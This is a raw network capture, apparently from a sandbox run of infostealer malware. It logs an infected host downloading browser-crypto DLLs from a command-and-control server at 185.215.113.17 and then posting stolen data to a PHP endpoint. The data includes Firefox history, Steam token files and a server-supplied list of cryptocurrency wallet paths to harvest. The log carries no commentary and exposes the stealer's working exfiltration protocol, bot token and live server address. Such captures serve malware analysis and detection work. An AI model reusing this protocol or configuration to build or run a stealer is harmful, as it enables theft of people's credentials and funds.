00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Aug 26, 2024 23:29:27.527297974 CEST	93	OUT	GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Aug 26, 2024 23:29:28.000560045 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:27 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Aug 26, 2024 23:29:28.580476046 CEST	94	OUT	GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Aug 26, 2024 23:29:28.824470043 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:28 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Aug 26, 2024 23:29:29.247884989 CEST	90	OUT	GET /f1ddeb6592c03206/nss3.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Aug 26, 2024 23:29:29.492713928 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:29 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Aug 26, 2024 23:29:31.079026937 CEST	94	OUT	GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Aug 26, 2024 23:29:31.323335886 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:31 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Aug 26, 2024 23:29:31.702002048 CEST	98	OUT	GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Aug 26, 2024 23:29:31.946036100 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:31 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Aug 26, 2024 23:29:33.400995016 CEST	202	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHC Host: 185.215.113.17 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Aug 26, 2024 23:29:33.730298042 CEST	1236	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHC Host: 185.215.113.17 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 47 6c 7a 64 47 39 79 65 56 78 4e 62 33 70 70 62 47 78 68 49 45 5a 70 63 6d 56 6d 62 33 68 66 5a 6e 55 33 64 32 35 6c 63 6a 4d 75 5a 47 56 6d 59 58 56 73 64 43 31 79 5a 57 78 6c 59 58 4e 6c 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e [TRUNCATED] Data Ascii: ------FIJDGIJJKEGIEBGCGDHCContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------FIJDGIJJKEGIEBGCGDHCContent-Disposition: form-data; name="file_name"aGlzdG9yeVxNb3ppbGxhIEZpcmVmb3hfZnU3d25lcjMuZGVmYXVsdC1yZWxlYXNlLnR4dA==------FIJDGIJJKEGIEBGCGDHCContent-Disposition: form-data; name="file"aHR0cHM6Ly9zdXBwb3J0Lm1vemlsbGEub3JnL3Byb2R1Y3RzL2ZpcmVmb3gKaHR0cHM6Ly9zdXBwb3J0Lm1vemlsbGEub3JnL2tiL2N1c3RvbWl6ZS1maXJlZm94LWNvbnRyb2xzLWJ1dHRvbnMtYW5kLXRvb2xiYXJzP3V0bV9zb3VyY2U9ZmlyZWZveC1icm93c2VyJnV0bV9tZWRpdW09ZGVmYXVsdC1ib29rbWFya3MmdXRtX2NhbXBhaWduPWN1c3RvbWl6ZQpodHRwczovL3d3dy5tb3ppbGxhLm9yZy9jb250cmlidXRlLwpodHRwczovL3d3dy5tb3ppbGxhLm9yZy9hYm91dC8KaHR0cHM6Ly93d3cubW96aWxsYS5vcmcvZmlyZWZveC8/dXRtX21lZGl1bT1maXJlZm94LWRlc2t0b3AmdXRtX3NvdXJjZT1ib29rbWFya3MtdG9vbGJhciZ1dG1fY2FtcGFpZ249bmV3LXVzZXJzJnV0bV9jb250ZW50PS1nbG9iYWwKaHR0cHM6Ly93d3cubW96aWxsYS5vcmcvcHJpdmFjeS9maXJlZm94LwpodHRwczovL3d3dy5tb3ppbGxhLm9yZy9lbi1VUy9wc [TRUNCATED]
Aug 26, 2024 23:29:34.140309095 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 26, 2024 23:29:34.255985975 CEST	468	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAF Host: 185.215.113.17 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 2d 2d 0d 0a Data Ascii: ------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="message"wallets------EHJDGHJDBFIJKECAECAF--
Aug 26, 2024 23:29:34.503983974 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:34 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Aug 26, 2024 23:29:34.516201019 CEST	466	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDA Host: 185.215.113.17 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 2d 2d 0d 0a Data Ascii: ------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="message"files------CAFBGDHCBAEHIDGCGIDA--
Aug 26, 2024 23:29:34.816690922 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 26, 2024 23:29:34.845216036 CEST	564	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAEHCAEGDHJKFHJKFIJ Host: 185.215.113.17 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CBAEHCAEGDHJKFHJKFIJContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------CBAEHCAEGDHJKFHJKFIJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CBAEHCAEGDHJKFHJKFIJContent-Disposition: form-data; name="file"------CBAEHCAEGDHJKFHJKFIJ--
Aug 26, 2024 23:29:35.151120901 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 26, 2024 23:29:35.192670107 CEST	473	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDHDAFIDGDBGCAAFIDH Host: 185.215.113.17 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 2d 2d 0d 0a Data Ascii: ------BGDHDAFIDGDBGCAAFIDHContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------BGDHDAFIDGDBGCAAFIDHContent-Disposition: form-data; name="message"ybncbhylepme------BGDHDAFIDGDBGCAAFIDH--
Aug 26, 2024 23:29:35.483556986 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 26, 2024 23:29:35.570139885 CEST	473	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFIDGIIIJDBGDGDAKKF Host: 185.215.113.17 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 49 44 47 49 49 49 4a 44 42 47 44 47 44 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 44 47 49 49 49 4a 44 42 47 44 47 44 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 44 47 49 49 49 4a 44 42 47 44 47 44 41 4b 4b 46 2d 2d 0d 0a Data Ascii: ------DBFIDGIIIJDBGDGDAKKFContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------DBFIDGIIIJDBGDGDAKKFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DBFIDGIIIJDBGDGDAKKF--
